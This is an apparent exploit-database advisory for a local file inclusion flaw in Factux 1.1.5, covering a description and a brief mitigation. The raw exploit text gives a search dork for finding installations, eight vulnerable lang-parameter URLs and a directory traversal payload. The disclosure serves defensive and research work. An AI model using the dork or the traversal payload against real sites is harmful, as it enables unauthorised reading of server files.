Factux LFI Vulnerability

vendor:

Factux

by:

altbta

7,5

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Factux

Affected Version From: 1.1.5

Affected Version To: 1.1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:factux:factux

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Factux is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The vulnerable files are admin_modif.php, admin.php, article_new.php, article_update.php, backup.php, backup_timeout.php, bon_suite.php, and ca_annee.php. An example of exploiting this vulnerability is by sending a maliciously crafted HTTP request to the vulnerable server, such as http://[site]/factux/ca_annee.php?lang=../../index

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to LFI attacks. This can be done by validating user input and sanitizing the input before using it in the application.

Source

Exploit-DB raw data:

[~]######################################### InformatioN
#############################################[~]
[~] Title : Factux LFI Vulnerability
[~] Author: altbta [l_9[at]hotmail.com]
[~] download : http://www.toocharger.com/telecharger/scripts/factux/3468.htm

[~]######################################### ExploiT
#############################################[~]
[~] dork: "Factux le facturier libre V 1.1.5"

### include_once("include/language/$lang.php");

[~] Vulnerable File :

http://127.0.0.1/Factux/admin_modif.php?lang=
http://127.0.0.1/Factux/admin?lang=
http://127.0.0.1/Factux/article_new.php?lang=
http://127.0.0.1/Factux/article_update.php?lang=
http://127.0.0.1/Factux/backup.php?lang=
http://127.0.0.1/Factux/backup_timeout.php?lang=
http://127.0.0.1/Factux/bon_suite.php?lang=
http://127.0.0.1/Factux/ca_annee.php?lang=


[~] Example :

http://[site]/factux/ca_annee.php?lang=../../index


[~]#########################################~~{  altbta
}~~######################################[~]

rxh & sad hacker & ab0-3th4b